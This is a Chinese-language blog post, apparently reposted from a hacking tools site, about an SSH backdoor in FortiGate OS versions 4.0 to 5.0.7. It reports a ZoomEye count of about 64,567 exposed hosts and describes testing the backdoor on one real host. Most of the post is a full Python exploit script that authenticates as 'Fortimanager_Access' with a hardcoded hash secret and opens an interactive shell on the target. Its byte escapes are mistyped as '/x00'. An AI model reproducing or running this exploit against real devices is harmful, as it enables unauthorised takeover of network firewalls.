飞塔系统存在SSH后门 影响版本 4.0 – 5.0.7

  • A+
所属分类:漏洞时代
摘要

from:tools.pwn.ren

from:tools.pwn.ren

今天 twitter 4 点钟的时候 有老外放出一个飞塔 os 的 exp ,说 4.0 – 5.0.7 !存在一个 ssh 的后门
进行了简单的测试,影响确实重大!
通过过Zoomeye搜索发现存在 64567台主机,
飞塔系统存在SSH后门 影响版本 4.0 – 5.0.7
挑选一台进行测试
飞塔系统存在SSH后门 影响版本 4.0 – 5.0.7
利用脚本
#!/usr/bin/env python  # SSH Backdoor for FortiGate OS Version 4.x up to 5.0.7 # Usage: ./fgt_ssh_backdoor.py <target-ip>  import socket import select import sys import paramiko from paramiko.py3compat import u import base64 import hashlib import termios import tty  def custom_handler(title, instructions, prompt_list):     n = prompt_list[0][0]     m = hashlib.sha1()     m.update('/x00' * 12)     m.update(n + 'FGTAbc11*xy+Qqz27')     m.update('/xA3/x88/xBA/x2E/x42/x4C/xB0/x4A/x53/x79/x30/xC1/x31/x07/xCC/x3F/xA1/x32/x90/x29/xA9/x81/x5B/x70')     h = 'AK1' + base64.b64encode('/x00' * 12 + m.digest())     return [h]   def main():     if len(sys.argv) < 2:         print 'Usage: ' + sys.argv[0] + ' <target-ip>'         exit(-1)      client = paramiko.SSHClient()     client.set_missing_host_key_policy(paramiko.AutoAddPolicy())      try:         client.connect(sys.argv[1], username='', allow_agent=False, look_for_keys=False)     except paramiko.ssh_exception.SSHException:         pass      trans = client.get_transport()     try:         trans.auth_password(username='Fortimanager_Access', password='', event=None, fallback=True)     except paramiko.ssh_exception.AuthenticationException:         pass      trans.auth_interactive(username='Fortimanager_Access', handler=custom_handler)     chan = client.invoke_shell()      oldtty = termios.tcgetattr(sys.stdin)     try:         tty.setraw(sys.stdin.fileno())         tty.setcbreak(sys.stdin.fileno())         chan.settimeout(0.0)          while True:             r, w, e = select.select([chan, sys.stdin], [], [])             if chan in r:                 try:                     x = u(chan.recv(1024))                     if len(x) == 0:                         sys.stdout.write('/r/n*** EOF/r/n')                         break                     sys.stdout.write(x)                     sys.stdout.flush()                 except socket.timeout:                     pass             if sys.stdin in r:                 x = sys.stdin.read(1)                 if len(x) == 0:                     break                 chan.send(x)      finally:         termios.tcsetattr(sys.stdin, termios.TCSADRAIN, oldtty)   if __name__ == '__main__':     main()

发表评论

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: